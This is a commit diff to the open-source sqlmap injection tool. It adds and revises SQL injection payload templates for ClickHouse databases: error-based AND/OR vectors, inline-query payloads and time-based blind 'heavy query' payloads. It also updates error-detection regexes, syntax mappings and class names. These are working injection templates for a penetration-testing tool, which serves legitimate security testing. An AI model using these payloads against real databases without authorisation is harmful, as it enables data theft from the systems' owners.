Some more fixes related to ClickHouse support (#5229)

This commit is contained in:
Miroslav Stampar 2023-02-03 23:56:50 +01:00
parent d7180d38c4
commit 30ba167cc1
8 changed files with 62 additions and 25 deletions

View File

@ -211,8 +211,9 @@
<error regexp="Syntax error,[^\n]+assumed to mean"/> <error regexp="Syntax error,[^\n]+assumed to mean"/>
</dbms> </dbms>
<dbms value="Clickhouse"> <dbms value="ClickHouse">
<error regexp="DB::Exception: Syntax error:"/> <error regexp="Code: \d+. DB::Exception:"/>
<error regexp="Syntax error: failed at position \d+"/>
</dbms> </dbms>
<dbms value="CrateDB"> <dbms value="CrateDB">

View File

@ -838,7 +838,7 @@
<title>IBM DB2 OR error-based - WHERE or HAVING clause</title> <title>IBM DB2 OR error-based - WHERE or HAVING clause</title>
<stype>2</stype> <stype>2</stype>
<level>4</level> <level>4</level>
<risk>1</risk> <risk>3</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector> <vector>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
@ -853,23 +853,41 @@
</details> </details>
</test> </test>
<test> <test>
<title>Clickhouse AND error-based - Parameter replace</title> <title>ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
<stype>2</stype> <stype>2</stype>
<level>2</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3,9</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||CAST(([QUERY]), 'String')||'[DELIMITER_STOP]' AS String)</vector> <vector>AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
<request> <request>
<payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||CAST((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)), 'String')||'[DELIMITER_STOP]' AS String)</payload> <payload>AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
</request> </request>
<response> <response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep> <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response> </response>
<details> <details>
<dbms>Clickhouse</dbms> <dbms>ClickHouse</dbms>
</details>
</test>
<test>
<title>ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
<stype>2</stype>
<level>4</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
<request>
<payload>OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>ClickHouse</dbms>
</details> </details>
</test> </test>

View File

@ -135,21 +135,21 @@
</test> </test>
<test> <test>
<title>Clickhouse inline queries</title> <title>ClickHouse inline queries</title>
<stype>3</stype> <stype>3</stype>
<level>2</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3,8</clause> <clause>1,2,3,8</clause>
<where>3</where> <where>3</where>
<vector>(SELECT '[DELIMITER_START]'||CAST(([QUERY]), 'String')||'[DELIMITER_STOP]')</vector> <vector>('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
<request> <request>
<payload>(SELECT '[DELIMITER_START]'||CAST((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)), 'String')||'[DELIMITER_STOP]')</payload> <payload>('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
</request> </request>
<response> <response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep> <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response> </response>
<details> <details>
<dbms>Clickhouse</dbms> <dbms>ClickHouse</dbms>
</details> </details>
</test> </test>

View File

@ -1494,12 +1494,30 @@
</details> </details>
</test> </test>
<test>
<title>ClickHouse AND time-based blind (heavy query)</title>
<stype>5</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>
<request>
<payload>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>ClickHouse</dbms>
</details>
</test>
<test> <test>
<title>Clickhouse AND time-based blind (heavy query) - fuzzBits</title> <title>ClickHouse OR time-based blind (heavy query)</title>
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>5</level>
<risk>1</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector> <vector>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>
@ -1510,7 +1528,7 @@
<time>[DELAYED]</time> <time>[DELAYED]</time>
</response> </response>
<details> <details>
<dbms>Clickhouse</dbms> <dbms>ClickHouse</dbms>
</details> </details>
</test> </test>

View File

@ -1319,7 +1319,7 @@
</search_column> </search_column>
</dbms> </dbms>
<dbms value="Clickhouse"> <dbms value="ClickHouse">
<cast query="CAST(%s AS String)"/> <cast query="CAST(%s AS String)"/>
<length query="length(%s)"/> <length query="length(%s)"/>
<isnull query="ifNull(%s, '')"/> <isnull query="ifNull(%s, '')"/>
@ -1331,7 +1331,7 @@
<limitstring query=" LIMIT "/> <limitstring query=" LIMIT "/>
<order query="ORDER BY %s ASC"/> <order query="ORDER BY %s ASC"/>
<count query="COUNT(%s)"/> <count query="COUNT(%s)"/>
<comment query="--" query2="/*"/> <comment query="--" query2="//"/>
<substring query="substring(%s,%d,%d)"/> <substring query="substring(%s,%d,%d)"/>
<concatenate query="%s||%s"/> <concatenate query="%s||%s"/>
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/> <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>

View File

@ -47,8 +47,8 @@ from plugins.dbms.altibase.connector import Connector as AltibaseConn
from plugins.dbms.altibase import AltibaseMap from plugins.dbms.altibase import AltibaseMap
from plugins.dbms.cache.connector import Connector as CacheConn from plugins.dbms.cache.connector import Connector as CacheConn
from plugins.dbms.cache import CacheMap from plugins.dbms.cache import CacheMap
from plugins.dbms.clickhouse.connector import Connector as ClickhouseConn from plugins.dbms.clickhouse.connector import Connector as ClickHouseConn
from plugins.dbms.clickhouse import ClickhouseMap from plugins.dbms.clickhouse import ClickHouseMap
from plugins.dbms.cratedb.connector import Connector as CrateDBConn from plugins.dbms.cratedb.connector import Connector as CrateDBConn
from plugins.dbms.cratedb import CrateDBMap from plugins.dbms.cratedb import CrateDBMap
from plugins.dbms.cubrid.connector import Connector as CubridConn from plugins.dbms.cubrid.connector import Connector as CubridConn
@ -125,7 +125,7 @@ def setHandler():
(DBMS.PRESTO, PRESTO_ALIASES, PrestoMap, PrestoConn), (DBMS.PRESTO, PRESTO_ALIASES, PrestoMap, PrestoConn),
(DBMS.ALTIBASE, ALTIBASE_ALIASES, AltibaseMap, AltibaseConn), (DBMS.ALTIBASE, ALTIBASE_ALIASES, AltibaseMap, AltibaseConn),
(DBMS.MIMERSQL, MIMERSQL_ALIASES, MimerSQLMap, MimerSQLConn), (DBMS.MIMERSQL, MIMERSQL_ALIASES, MimerSQLMap, MimerSQLConn),
(DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES, ClickhouseMap, ClickhouseConn), (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES, ClickHouseMap, ClickHouseConn),
(DBMS.CRATEDB, CRATEDB_ALIASES, CrateDBMap, CrateDBConn), (DBMS.CRATEDB, CRATEDB_ALIASES, CrateDBMap, CrateDBConn),
(DBMS.CUBRID, CUBRID_ALIASES, CubridMap, CubridConn), (DBMS.CUBRID, CUBRID_ALIASES, CubridMap, CubridConn),
(DBMS.CACHE, CACHE_ALIASES, CacheMap, CacheConn), (DBMS.CACHE, CACHE_ALIASES, CacheMap, CacheConn),

View File

@ -20,7 +20,7 @@ from thirdparty import six
from thirdparty.six import unichr as _unichr from thirdparty.six import unichr as _unichr
# sqlmap version (<major>.<minor>.<month>.<monthly commit>) # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.7.2.2" VERSION = "1.7.2.3"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)

View File

@ -16,7 +16,7 @@ from plugins.dbms.clickhouse.syntax import Syntax
from plugins.dbms.clickhouse.takeover import Takeover from plugins.dbms.clickhouse.takeover import Takeover
from plugins.generic.misc import Miscellaneous from plugins.generic.misc import Miscellaneous
class ClickhouseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): class ClickHouseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
""" """
This class defines ClickHouse methods This class defines ClickHouse methods
""" """